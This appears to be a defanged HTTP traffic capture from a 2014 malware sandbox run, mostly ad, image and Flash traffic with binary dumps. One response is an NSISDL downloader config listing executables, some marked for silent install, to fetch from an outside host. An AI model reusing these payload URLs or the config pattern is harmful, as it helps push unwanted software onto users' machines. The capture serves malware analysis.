..h.....#. ..Nt.U.'..9..F.!R.].<..&..x..3.~.K...o.}.1./d1.5SZ.0....
.3!#.b....>Z..........*...7@..=/...;...:...........d.l.y..S.PYc.A..
........K...E..Q.........9..TD...m.W.C....z.{....#........{....ZO.
<<< skipped >>>


GET /media/v1/0f0000vLC1Ofnh0LFprLSs.swf HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: hXXp://ubmcmm.baidustatic.com/media/v1/0f0002EBaHfWMpy9Ew2v2s.swf?url_type=1&id_555316071=media/v1/0f000rmn6cn7D14hDeZLyf.gif&id_5553832
x-flash-version: 11,6,602,168
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ubmcmm.baidustatic.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: JSP2/1.0.27
Date: Fri, 13 Jun 2014 17:29:16 GMT
Content-Type: application/x-shockwave-flash
Connection: close
Content-Length: 4565
Cache-Control: max-age=31536000
Expires: Fri, 27 Mar 2015 08:01:35 GMT
Last-Modified: Sat, 25 Apr 2009 07:04:00 GMT
media: media
CWS.....x..8.X.W..N2.,,a...,[email protected].! X.L..D..$,.m.U.V.V.k.R.Q..TET
..T[..V...E....V.....[.....}o.;[email protected]]....,.*..
...(.Oc2.E..WVVJ*.J...`Yddd.4$8$$.S........R. ~.C......-3i..b..V..M1~~
...U..- 7..D.U...)aJM.`.D...UQEzC.m....tZ.m..\.d..Us*..&.HG.5../.-<
*.C...XZ]B.a.C.?`.|Y.R.5j..)^@-4&.I..&.Zu.D./....$.t..Bq.D:.3Le.W..o..
.%.........mb.L.R.....-$:.....fb.....!...!........A....0.L....%...gAF.
....Cp8c!Ix........t>....o6dF...0..=....?.. f....A....!...L..Q...KM
`.....h.z.............a.a..k8.\./.../.qX....0`..$..U..3.r..=..L.y.....
[...{......$..8..2.~..}s..\_..8.l0E;.....? ...q.9..!...."..k.....>.
.."....q...ug..OIG..M.qs}..._U...\[email protected]..........[/.
.u.`...S@..>..N.......)..'.n.i....@.}3...k. .b...1.o....j..r..d....
.....x....}......_......C.......|..'.......R.....s...g.........f.....q
.."... X9k....M.}...g...........E ....X.@4@L...(....g..i....?.......C.
!.........\..b1p.W.}O/mUys..L{....0g/..X'...G)..Nz}; .o.f..wgg&m4c%..[
..~.T.R.l...U.....@pO.......\...._.....O. kq.l..ulzK.........Uv...~.}.
*.S ..?..v/;..m.u...'..?....M...4%yw.....u]....Y..}......Zi.w>..=..
.}.... ......73....S)..bH.c...[|iD.k..n..rI...Q..o.`a.v...u ...C....4}
.<@n`..q....}..-F.0/`[email protected]. ..f0.(@.0 cNAV..w..W.........f8$R
@g.....M..........qgT.?.i....2..O.D.?.;|.f..T....u{..h..F@.....|i.-}..
..q..]..B.(...........](........vU..i....y.Oa..y..'.........Jl..7.c..@
.g..<S..w....Bt....G......f...l..:..W...[.g...h...F.z}.P...7rG.... 
...E...n..Cx...&y.....%.....\.V../.....p.,..H.gl.........k2...KK..
<<< skipped >>>


GET /sw-search-shadu/client/dllv4/BDMReport.dll HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh,en-US
Connection: Keep-Alive
Host: dlsw.baidu.com
Range: bytes=1048576-
Referer: hXXp://dlsw.baidu.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)


HTTP/1.1 206 Partial Content
Server: JSP2/1.0.27
Date: Fri, 13 Jun 2014 17:28:50 GMT
Content-Type: application/x-msdownload
Connection: close
Content-Length: 158944
Content-Range: bytes 1048576-1207519/1207520
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE
Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id
Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length
Accept-Ranges: bytes
Last-Modified: Tue, 20 Aug 2013 07:03:07 GMT
Expires: Sat, 14 Jun 2014 07:20:40 GMT
x-bs-version: A65F70E089635AE47A1E2AED4F13B889
ETag: 30cbc602ada7cdfb0346038c05996d84
x-bs-request-id: MTAuMjE0LjQyLjIyOjgwODA6MTQ3NzYzMjU5MToxMS9KdW4vMjAxNCAxNToyMDo0MCA=
x-bs-meta-crc32: 2965621797
Content-MD5: 30cbc602ada7cdfb0346038c05996d84
x-bs-client-ip: MTE1LjIzMS40Mi4xMjA=
........4.............................................................
......................................................................
................................................ .....................
......................................................................
................................................................s.c.p.
h.....f.u.n.c.w.n.d...s.t.m.d.....e.l.e.v.a.t.e...s.e.l.p.l.u.g.i.n...
m.o.d...B.D.M.P.r.o.c.e.s.s.T.y.p.e._.R.u.n.O.t.h.e.r...B.D.M.P.r.o.c.
e.s.s.T.y.p.e._.G.a.m.e.A.c.c.....B.D.M.P.HTTP/1.1 206 Partial Content
..Server: JSP2/1.0.27..Date: Fri, 13 Jun 2014 17:28:50 GMT..Content-Ty
pe: application/x-msdownload..Connection: close..Content-Length: 15894
4..Content-Range: bytes 1048576-1207519/1207520..Access-Control-Allow-
Origin: *..Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST
, DELETE..Access-Control-Expose-Headers: Content-Length, ETag, x-bs-re
quest-id, x-pcs-request-id..Access-Control-Allow-Headers: Range, Origi
n, Content-Type, Accept, Content-Length..Accept-Ranges: bytes..Last-Mo
dified: Tue, 20 Aug 2013 07:03:07 GMT..Expires: Sat, 14 Jun 2014 07:20
:40 GMT..x-bs-version: A65F70E089635AE47A1E2AED4F13B889..ETag: 30cbc60
2ada7cdfb0346038c05996d84..x-bs-request-id: MTAuMjE0LjQyLjIyOjgwODA6MT
Q3NzYzMjU5MToxMS9KdW4vMjAxNCAxNToyMDo0MCA=..x-bs-meta-crc32: 296562179
7..Content-MD5: 30cbc602ada7cdfb0346038c05996d84..x-bs-client-ip: MTE1
LjIzMS40Mi4xMjA=..........4...........................................
..................................................................
<<< skipped >>>


GET /app.txt HTTP/1.0
Host: pps.adsbw.cn
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Content-Length: 947
Content-Type: text/plain
Last-Modified: Fri, 13 Jun 2014 15:40:24 GMT
Accept-Ranges: bytes
ETag: "0a5c4ca1d87cf1:464"
Server: Microsoft-IIS/6.0
Date: Fri, 13 Jun 2014 17:28:31 GMT
Connection: close
[xxx1]..aa=..........bb=goodpic_dae_619.exe..cc=hXXp://souhu.1htb.cn/g
oodpic_dae_619.zip..dd=..[xxx2]..aa=......bb=KXWebBox_3452_RBF.exe..cc
=hXXp://souhu.1htb.cn/KXWebBox_3452_RBF.zip..dd=..[xxx3]..aa=....fm..b
b=wwwww_3340.exe..cc=hXXp://souhu.1htb.cn/wwwww_3340.zip..dd=..[xxx4].
.aa=17173..bb=_xhzm10_s.exe..cc=hXXp://souhu.1htb.cn/_xhzm10_s.zip..dd
=..[xxx5]..aa=sd..bb=spkjrjp_30279.exe..cc=hXXp://souhu.1htb.cn/spkjrj
p_30279.zip..dd=..[xxx6]..aa=3609..bb=setup_34_sltinstall.exe..cc=http
://souhu.1htb.cn/setup_34_sltinstall.zi..dd=..[xxx7]..aa=........bb=TT
K_7160010020140313_v142.exe..cc=hXXp://souhu.1htb.cn/TTK_7160010020140
313_v142.zip..dd=..[xxx8]..aa=..........bb=setup_t10322.exe..cc=http:/
/souhu.1htb.cn/setup_t10322.zip..dd=..[xxx9]..aa=2345..bb=2345Explorer
_327501_silence.exe..cc=hXXp://souhu.1htb.cn/2345Explorer_327501_silen
ce.zip..dd=..[xxx10]..aa=..........bb=setup_4629_p3c0.exe..cc=hXXp://s
ouhu.1htb.cn/setup_4629_p3c0.zip..dd=..



GET /x/mnh/right/409/?spid=-37237366455960 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.mnh.kaixin200.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: text/html
Content-Encoding: gzip
Last-Modified: Mon, 09 Jun 2014 08:48:20 GMT
Accept-Ranges: bytes
ETag: "0224d90bf83cf1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Date: Fri, 13 Jun 2014 17:29:24 GMT
Content-Length: 2570
...........Y{S.......;h....l..M..E.y.l....e..x\F..X.[[email protected]...!.
..C..` |._..._..J.,c0I.....:..9.....W..x...._..J*I}...oo\.h...5p.a..].
..M.w.R~..j.xQ..!-.I..~.....d.1LWW.. .MK.L...n".O..C.b......z.LH...J.2
w...ss..n.#>F.).......Y..G_M....O[O..T...h.u ..n...^...e..."M1D."(I
....<...!..... .....s.9..P..e.'...B.M)..,;*.eY6...B..{.........t.f.
N$3.T.....bN.}.L.{.H...?I%.....Q.......,...g.(...D...H...".b..6..|....
..~...u...G.8...-.I......u.....it9/_.`.u...u.....x%..!.......DNk..H...
Q..LGyb.WF..M.\`E.a.M.[,a.$.l.{6R.}..HH.J..@:.4.-."..sd....".9.;|.K.I@
..:{../g..w.).L.. ..N..sx....}[email protected]
...i..3V....dZFN.*SW......>.....7..!..=.R.I....T.8.4.;.i@..) ......
 oTB...'...0..r.AH.....j.a`.........([email protected][email protected]....
D...../.......7!J..a_.."|[email protected]^A...\A..........w]:26LB...t.c=....P
.$/......k...\6iN....X..LR..._......u0...:._^..8..#...h.7...O.(.....P.
.R.~..m..........Y..tu_....[....6..........)...z.K...T...:..82N...f.I.
.....Z..."....4.?...!.mcT2:_CC.vY.....{)..1.il...X.;.2W.......4.o...X.
..'...%..t..,&...../.._q...6......<.\...........Q..jTeI..:.j..P....
.l*.......G..?-...T.~.....F.{.R.kuv...=^..o.i.....g#x..z<.s...A{...
|[email protected];..(.s..{O].X.\V....Z..-.......^my.X.e..[.J}..!ZO...." X
..........)-l......e....F....3wr.|qYX....<[email protected]..#*-F.B..G[%..Y...
fv.1%...&..j.`T.[...,......a.;........3.W.`#U..i;..$..V...1u!_......l.
.`.(.......m[.....$.=7..........y.F.Z.;yC......../..%K ..C...A...[.|W.
......iw.w.lZo.i....K..G.{[email protected]
<<< skipped >>>


GET /media/v1/0f000Z60AW17JZtxZIQVsf.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: hXXp://ubmcmm.baidustatic.com/media/v1/0f0002EBaHfWMpy9Ew2v2s.swf?url_type=1&id_555316071=media/v1/0f000rmn6cn7D14hDeZLyf.gif&id_5553832
x-flash-version: 11,6,602,168
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ubmcmm.baidustatic.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: JSP2/1.0.27
Date: Fri, 13 Jun 2014 17:29:14 GMT
Content-Type: image/png
Connection: close
Content-Length: 9512
Cache-Control: max-age=31536000
Expires: Sat, 28 Mar 2015 04:06:01 GMT
Last-Modified: Sat, 25 Apr 2009 07:04:00 GMT
media: media
.PNG........IHDR.....................gAMA....7.......tEXtSoftware.Adob
e ImageReadyq.e<....PLTE.Oh1Bm....9L.....{...,;eVk.......*4Zsnm9W..
..................n....................CZ...FQp.........Mp..........s.
...........cu.........v.....dw..2;......................* ....r.......
...I]..................~.,3...QNR.......<F.........................
HZ..................gs.............................../8\......;[.$ F}z
v.............~sgx........\hv.....(.S......Tb}.........s{.............
.......Vo:`.......tw....dj.......z............Wr............6O........
........?b....h....................;S}.->_WTv..g.....b`g...........
...9............)1M|..B .......`n.r:KW}.......................2C...1J.
@^....99I...1Ix<C].......j..**...1*G......................DW.......
.........0U....b}..../0..............................KGB....wd.......1
@.Ja.........!#9.2z......p..`^.....*.k....tRNS........................
......................................................................
......................................................................
......................................................................
......................S..%.. .IDATx....XS....PB.........b.i.="....1H..
.T...Eo...)......"B."...r.) )U.V.X..`.!.....G.T......E.....Py..g..[.w\
..4..d(.................~ ..6....m.O.._c..z.Cm...E..z.q....D..!S..bOrn
r.1.X...z.0b....\/.s\=u`.i.......K.C?A..|.8..l....$LoO..=...eAV./l..A.
0..@U-V..._^H.k ....prW..]......A..X.u.->.t..).....g......#...C....
63A..Lg..S...s.$..7,p.k.....#'.H&......"...f......!.D......N)....L
<<< skipped >>>


GET /media/v1/0f0000mUMSYcE3MmsKSaAf.swf?url_type=1&snapshot=& HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: hXXp://pos.baidu.com/ecom?cec=utf-8&dai=1&cfv=11&cpa=1&col=en-us&dis=0&xuanting=0&n=67025059_1_cpr&conOP=0&scale=&skin=&rsi0=336&rsi1=280&rs
x-flash-version: 11,6,602,168
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ubmcmm.baidustatic.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: JSP2/1.0.27
Date: Fri, 13 Jun 2014 17:29:04 GMT
Content-Type: application/x-shockwave-flash
Connection: close
Content-Length: 53824
Cache-Control: max-age=31536000
Expires: Thu, 11 Jun 2015 01:00:06 GMT
Last-Modified: Sat, 25 Apr 2009 07:04:00 GMT
media: media
CWS.V...x...eT\[email protected]\.h.%. .C........I..5..Np.`.....9...x
......4..zfUM.YU..=.'.......(~.....&......p..D.hm'q. ..j.$t;....m.`...
.....B..v_.B.!.".YTl`.Z..i...o.a........e.I...u6.;~fh .=.. s.-.....IVb
{s..B d...={....-...-$v..p;.].2.)z.........2......y.[...)C............
C7.....?`......<6o._..T..$.*VC.M.y;.B..M......E'in.`..;..."#}.....z
C......O..)....5.......@;.2.$t4W..r.....CW.........C....a.3.0.....#O.q
..........6..... ......~U....#..Q..xJ!..?*[email protected].....
w........H..x"T......L.>.s...y....X..Y.D.xJ.......D.G.....r,:....?*
<4............>N...,R9.$..Q......-rN-8..(...FK.. ....2.j..O.....
,./.fJu......F.......w...oNA.`UV.{..IV...P.$'. ..C_...Po.,. ..6...T.  
...[..%..A..6..."L..4...n........$.E.....Y]YR.....(H.0.......Dg.6.g...
..X/C...........Q...z8...............vK.^Uq..v.|u.........r..Bb..(.'zL
...b.,....EN... .....c..?.L..#.....F..w.3*.D.P.T...%<..c...8_7.r..|
;Y.\] .06".d.5.(?Y..j...N..U..7..gK.Xzss...2..(.....D...R!....j..zfh0.
.y..'.qu. x.D.!_]Ef..WN.....u.ew..!..j........1..f...0..3.2&.......j.3
...?..^Ai<._b../..t/d...4"Y?....i.^..)F./s.....\_.W.........8....V.
E.y.. .T.F..U@..^........q.....A......,.'.B...;#...o..R...}..?.J.}H...
.X...........U..;.Nf?.?...I....5.g.L...=.=.'...F.....l..~..&......1&..
d.r..zrA{.[N..[sI....e.L....td}.v..x...d..Eru.c....EbG..yC..PqN..u>
8L........G....}h/...>...w...=.>.6_..8............'..)......#v(Y
...7W...jZ..l.R.Yd...y...P......9.n~...E.r51...0K1....i..MB.hDr.~b....
g ..}..............7#..M.N.[{...quP.....C.......7...c...p>.:..n
<<< skipped >>>


GET /s.htm?cproid=49F93F86C60D03A8D23F3919153C48A7&t=1402680571713 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Referer: hXXp://pos.baidu.com/ecom?cec=utf-8&dai=1&cfv=11&cpa=1&col=en-us&dis=0&xuanting=0&n=67025059_1_cpr&conOP=0&scale=&skin=&rsi0=336&rsi1=280&rsi5=4<r=http://VVV.mnh.quzhao.com/x/mnh/mini/q428/mnh_428cc.html<u=http://VVV.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?1?id=0&pcs=758x450&rss0=#FFFFFF&rss1=#FFFFFF&rss2=#0000FF&rss3=#444444&rss4=#008000&rss5=&rss6=#e10900&rss7=&rad=&pis=10000x10000&aurl=&psr=1276x846&pss=758x493&tpr=1402680568181&lunum=6&ch=0&at=6&qn=b4429549b809eb77&ps=-2x-2&tn=text_default_336_280&ts=1&td_id=1537509&adn=3&cad=1&ccd=32&dtm=BAIDU_DUP2_SETJSONADSLOT&dc=2&di=u1537509
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: s.cpro.baidu.com
Connection: Keep-Alive
Cookie: BAIDUID=D1F510B78251BF62B517A49EAEC89AE3:FG=1


HTTP/1.1 200 OK
Date: Fri, 13 Jun 2014 17:29:27 GMT
Server: ECOM Apache 1.0.11.0
Last-Modified: Wed, 13 Mar 2013 08:33:40 GMT
ETag: "72cc152-f-514039e4"
Accept-Ranges: bytes
Content-Length: 15
Content-Type: text/html
just for test2...



GET /adx.php?c=cz03MWUzZWY1YjIzZTYyNTUxAHQ9MTQwMjY4MDU2OQBzZT0xAGJ1PTEAcHJpY2U9VTVzMC1RQUVSRjU3akVwZ1c1SUE4czZqSHN0S3pQd0g2emVBTEEAY2htZD0xAHY9MQBpPTEzNDIwOTJh HTTP/1.1
Accept: */*
Referer: hXXp://pos.baidu.com/ecom?cec=utf-8&dai=3&cfv=11&cpa=1&col=en-us&dis=0&xuanting=0&n=67025059_1_cpr&conOP=0&scale=&skin=&rsi0=728&rsi1=90&rsi5=4<r=http://VVV.mnh.quzhao.com/x/mnh/mini/q428/mnh_428cc.html<u=http://VVV.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?1?id=0&pcs=758x450&rss0=#FFFFFF&rss1=#FFFFFF&rss2=#0000FF&rss3=#444444&rss4=#008000&rss5=&rss6=#e10900&rss7=&rad=&pis=10000x10000&aurl=&psr=1276x846&pss=758x493&tpr=1402680568181&lunum=6&ch=0&at=6&qn=0420a4ea8165ad22&ps=357x3&tn=text_default_728_90&ts=1&td_id=1537506&adn=3&cad=1&ccd=32&dtm=BAIDU_DUP2_SETJSONADSLOT&dc=2&di=u1537506
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: wn.pos.baidu.com
Connection: Keep-Alive
Cookie: BAIDUID=49F93F86C60D03A8D23F3919153C48A7:FG=1; ISBID=49F93F86C60D03A8D23F3919153C48A7:FG=1; ISUS=49F93F86C60D03A8D23F3919153C48A7:FG=1; CPROID=49F93F86C60D03A8D23F3919153C48A7:FG=1; BAIDUID=D1F510B78251BF62B517A49EAEC89AE3:FG=1


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 13 Jun 2014 17:29:30 GMT
Content-Type: image/gif
Content-Length: 49
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
GIF89a...................!.......,...........T..;..



GET /play/meinvyingimg/btnIcon/2.png HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: image.anbangjiance.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: image/png
Last-Modified: Wed, 26 Mar 2014 05:52:25 GMT
Accept-Ranges: bytes
ETag: "98553490b748cf1:0"
Server: Microsoft-IIS/7.5
Date: Fri, 13 Jun 2014 17:28:16 GMT
Content-Length: 2348
.PNG........IHDR.......$.......l.....pHYs................ cHRM..z%....
..........u0...`..:....o._.F....IDATx...m.TW.........Yv.mw.e_XhS..B...
....BU.)k..[.I..j.46.>...DcL......R.&.%[email protected]....;s.....0
{g...Y.,./.,.s...<...}.s.EY...*t.^`6....*....W.C.#T....k.F....9.y.1
%..:....a....^....`.....!........K...Ld..Vx... F...4...!...X..a..b...Q
.D..~Id.$..=b . .... .. .".. .... .b . .. .".. Lh.QJY...R.?K.J.{.f..r.
.....V...v........c[.>n.....>....G$..j..........%...sl...7......
.`....>....P.._.^.wzhJMB...............w.;o~8ox......]..yoK{.BP..,k
.Rj.eY;..OD..K....p.p...q...F>r.T........I..A.f4....brS........:..&
gt;....e...r..K.....#...I...."..{.t.Akg..?.D}**.....>d7.....<...
#&.T.x......d .e.2.Aq..#..OvQ.s...c}..#.....=0<d&.-t.'.~n......e...
.i. 7u>.>....l...............c.Y......O..t..M.....U..c../?......
i.$.:_....o.wu.Y.w....]i^....J3?.....a.B..[.%=m..../..BEj..Vo.F.)&....
<O.as......A....b .D....f v..R.U...d /~....G.g.J7.j. ..F=...3qh...]
^..I.......T.q.b.l .......$.H...A.\.8Q. ....#.eb.Y..af...W.,.$XN.R.w..
.o...r....zyw..Q...:......<s.$.[[email protected].
...C7...3.<gO.u;...p..x.....UM%....!.......X....L. ^...`Z...A)...{.
Q4...P0*% v%.j*....E..v...?..H<*h ~...7.!..]h&V.>^....0,..[.....
..p..T..O.y.l."z..^CD..i:[email protected].,..uu..V(........".a.G.-.G..d'...
9/..P>3qa*.E..r*..i...u%..?.......A....F...F...8.V.....:8..>...4
.].B.8....PJc.].... .......;.d....s'q...=.s......A-.}....[..O.-/9d.c.i
...JY.{.^......k...%=m....*).n...=kY.s..I..2..:5..W~N..,,..>.ei
<<< skipped >>>

GET /play/meinvyingimg/btnIcon/4.png HTTP/1.1


Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: image.anbangjiance.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: image/png
Last-Modified: Wed, 26 Mar 2014 05:52:26 GMT
Accept-Ranges: bytes
ETag: "3c34d790b748cf1:0"
Server: Microsoft-IIS/7.5
Date: Fri, 13 Jun 2014 17:28:16 GMT
Content-Length: 2460
.PNG........IHDR.......$.......l.....pHYs................ cHRM..z%....
..........u0...`..:....o._.F..."IDATx...]L.....wvva.XR>\lH\#.....Hj
...... '.}pR.R..JQ..*.Z.S.......U..TJ#.HNLj').N.lb;..K..`....;..ewg..a
.gXvv.....6.'...........9sg`.s....`.....4..!..2.S..4.........PM.Q...x.
........`;..#8...9,.8,...."..#.....x.".GE"k.a9.a.....c..h......l.#...@
..,[email protected].".! [..!.!.. H@.. .... .... .. .!.. .<..oi8.....z.F.9.{y..
.A...[4......~....c.3...r.X...P......j.4.^83.t...w...o..=..c}F.....e.8
....'.n`..e|r..rd.0.........qD......>8}...!..E....?.........6......
...>.w.._T...z...P.....s.....~..\.9.g...........~......^..m....j.t.
sh.0.V.Y.o.xo....o.l {[email protected].....&R.e..u.#S.l.E#&.C../..F.....G...
.O.|f...........&.~1...E?....q..?q.c..h{d.i.!Rnf..|..6...IL.]Y.."...O.
q.."6.V.=.$ .....(.,..|.<.....H..4..h#.PP.|8<..RP.{Z;.........Ow
.F.}.v..yD..N.......\H.8N.|..MkP..a.=V9...%S.b.<.......(;{r..Me..Hd
.3.........|.\....).`........h. M x...J@.~.&..d..7.G#*HG.6......g..H8Q
..&..q...$.S..)T....j....x....V.............aB........02.P0..{...x..pI
n0I.O$.O...-.R..e@.........#.S&...".7..D....z>.....0~).PP..E.JL./..
PV!..'.e......=.....@;.o.h...........ZP..%.cg.)-&......R ../....?...'.
.......8.#.xUm}.....s..V....%.^4.%...iog...`;f..p.}?......n......$p...
w.`.....all.........9h9..z......H{;g....../af2..V.q....`s.:....y..(...
|...:....Y.ff...B.9/;}.>..:...<%R.........;...w...ii...|.q..B..}
.-.-..dkkTl..,K8.B7........]..rI2.I..R.,..v.j...6.....Bd6...Q...\.....
PU.......3...ux|o.. ..d.3.X.J..C...Z........[221.b.....V..>....
<<< skipped >>>

GET /play/meinvyingimg/btnIcon/7.png HTTP/1.1


Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: image.anbangjiance.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: image/png
Last-Modified: Thu, 10 Apr 2014 08:13:49 GMT
Accept-Ranges: bytes
ETag: "7e983dcd9454cf1:0"
Server: Microsoft-IIS/7.5
Date: Fri, 13 Jun 2014 17:28:17 GMT
Content-Length: 2569
.PNG........IHDR.......$.......l.....tEXtSoftware.Adobe ImageReadyq.e&
lt;... iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1
.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http:/
/ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photo
shop CS5 Windows" xmpMM:InstanceID="xmp.iid:D9651421C08411E388199CCC8C
4C5FCC" xmpMM:DocumentID="xmp.did:D9651422C08411E388199CCC8C4C5FCC">
; <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:D965141FC08411E38819
9CCC8C4C5FCC" stRef:documentID="xmp.did:D9651420C08411E388199CCC8C4C5F
CC"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> 
<?xpacket end="r"?>[. .....IDATx...[h.U....nvsmHJ...V.m.A!/.>
./*>x.....K.Jh....%...S..z)AP....(...}....m.b....I........I.L...93.
............/....9g......if.1..Y...",2...yfEt.Vd..1{.Y3.."L3;.....h...
........Q..)X..gv.].........C.....,}...N..6L....... .............<&
gt;$....................................A....ttt.......F..dd..1r9.g}u.
R.`.g$..nP...|D% {.}.l..9R......~....]f.$.q..3l"@=.z......._l...kO-...
..#._^mX;W.K...YZ,.lmCf...v}.cO.-.....*...[[/1Q............d.ds)27..~.
...#i..a.#M-Y.......*"...E...R.H...|$/.Q.H.)"...a-.......Vf?.1z|..!Q..
.......l.......................D...e}..]T... ..._RF&#.L........%.O
<<< skipped >>>

GET /play/meinvyingimg/btnIcon/5.png HTTP/1.1


Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: image.anbangjiance.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: image/png
Last-Modified: Wed, 09 Apr 2014 03:32:57 GMT
Accept-Ranges: bytes
ETag: "f113166a453cf1:0"
Server: Microsoft-IIS/7.5
Date: Fri, 13 Jun 2014 17:28:17 GMT
Content-Length: 3780
.PNG........IHDR.......$.......l.....tEXtSoftware.Adobe ImageReadyq.e&
lt;... iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1
.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http:/
/ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photo
shop CS5 Windows" xmpMM:InstanceID="xmp.iid:238976D5BF9511E3AB778E8C78
ACF1D6" xmpMM:DocumentID="xmp.did:238976D6BF9511E3AB778E8C78ACF1D6">
; <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:238976D3BF9511E3AB77
8E8C78ACF1D6" stRef:documentID="xmp.did:238976D4BF9511E3AB778E8C78ACF1
D6"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> 
<?xpacket end="r"?>a..z...:IDATx..].l....3....].0`c.N.e .`(..!..
...$J.B*PTZ..T. [email protected]].v...b.............zwgz..,,...
.....{.#{g........}of9Q..`*X.k........^d...2D.a*..?C~....x$.C~...G.b:.
C~.....G. .2.`!...&u.)......=.<L..L%.2.`!_!#7..<[email protected]..&l
t;........"...X..A.B ...2...@ .........@ ..d ...@ .........@ .....(._.
.:D.g..y..{k....!=.w.'...j.*...X..k-...u_#.PEmm...........U#>!..*.l
......?9[.[z.t..... .]..U9....c.../o(..s....9.Y.....un.....eN(..|...zy
[email protected]'L...:....V.k=.....sP<&o<.....".=.....3....G....o". ..
[email protected]=...cy,.3J-.N..#....w.=s.w#.sA...._..u....Q\bm.N..77...
<<< skipped >>>


GET /hmt/icon/21.gif HTTP/1.1
Accept: */*
